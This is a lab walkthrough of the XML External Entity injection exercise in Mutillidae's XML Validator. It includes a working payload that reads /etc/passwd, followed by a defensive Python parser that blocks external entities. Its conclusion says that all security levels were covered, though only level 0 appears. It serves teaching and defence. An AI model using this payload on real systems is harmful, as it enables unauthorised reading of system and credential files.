Mutillidae - XML External Entity Injection (XML Validator)

In this walkthrough, we will go through the XML External Entity Injection (XML Validator) vulnerability section from Mutillidae Labs. We will explore XML External Entity Injection in the XML Validator utility and learn how applications are affected by it. So, let’s get started with the hacking without any delay.

XML External Entity Injection (XML Validator)

Security Level: 0 (Hosed)

  • Setting the security level to 0 or Hosed.

Security level 0

  • The application has an XML validator which takes input data in XML format, processes it and displays it on the page below.

XML Validator

Checking for XML Injection

  • I used the XML payload below to dump the contents of /etc/passwd.

<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
 <lastName>&ent;</lastName>
</userInfo>

Dumping /etc/passwd

Conclusion

So, we finally completed all the security levels for the Mutillidae XML External Entity Injection (XML Validator) vulnerability. We looked into how the application has been set up at the various levels and how we can bypass the security controls implemented. Next, we can mitigate potential XXE attacks by disabling dangerous features in the XML parsing library and by disabling support for “XInclude”. On that note, I will take your leave and will meet you in the next one, till then “Keep Hacking”.
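One way to apply the mitigation just described, as an added example in Python rather than Mutillidae's own PHP code: a SAX-based parser for the validator's <userInfo> document that never resolves external entities and, by default, rejects any DOCTYPE before an entity can be declared. The element names come from the payload above; the function and handler names are hypothetical.

```python
import io
import xml.sax
from xml.sax import handler

class _NoDtdLexicalHandler:
    """Lexical handler whose only job is to abort on the first DTD declaration."""

    def startDTD(self, name, public_id, system_id):
        raise ValueError(f"DOCTYPE {name!r} is not allowed in user-supplied XML")

    # The remaining lexical callbacks are required by expatreader but unused.
    def endDTD(self): pass
    def comment(self, content): pass
    def startCDATA(self): pass
    def endCDATA(self): pass

class _UserInfoHandler(handler.ContentHandler):
    """Collects the text of each child element of <userInfo> (e.g. lastName)."""

    def __init__(self):
        super().__init__()
        self.fields, self._current = {}, None

    def startElement(self, name, attrs):
        if name != "userInfo":
            self._current = name
            self.fields.setdefault(name, "")

    def characters(self, content):
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        self._current = None

def parse_user_info(xml_text, allow_dtd=False):
    """Parse a <userInfo> document with XXE protections on; returns {name: text}."""
    parser = xml.sax.make_parser()
    # External entities are never resolved, so a SYSTEM entity for
    # file:///etc/passwd yields no text even if a DTD is allowed through.
    parser.setFeature(handler.feature_external_ges, False)  # no SYSTEM entities
    parser.setFeature(handler.feature_external_pes, False)  # no external DTDs
    if not allow_dtd:  # stricter: reject any DOCTYPE before entities are declared
        parser.setProperty(handler.property_lexical_handler, _NoDtdLexicalHandler())
    content = _UserInfoHandler()
    parser.setContentHandler(content)
    parser.parse(io.StringIO(xml_text))
    return content.fields
```

Feeding the /etc/passwd payload from this page into parse_user_info raises ValueError at the DOCTYPE; with allow_dtd=True it parses but &ent; expands to nothing, so the response never carries file contents.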
